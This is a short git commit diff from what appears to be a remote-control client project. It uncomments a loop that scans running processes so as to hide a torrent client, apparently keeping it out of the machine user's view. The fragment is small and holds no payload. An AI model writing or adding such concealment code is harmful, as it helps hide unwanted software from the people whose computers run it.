Enable loop to hide the torrent client

This commit is contained in:
NYAN CAT 2019-05-23 04:10:41 +03:00
parent b0cb9cb9bb
commit a0f7c17a5c

View File

@ -65,7 +65,7 @@ namespace Client.Handle_Packet
Stopwatch stopwatch = new Stopwatch();
stopwatch.Start();
// while (stopwatch.Elapsed < TimeSpan.FromSeconds(5))
while (stopwatch.Elapsed < TimeSpan.FromSeconds(5))
{
Thread.Sleep(1);
foreach (Process p in Process.GetProcesses())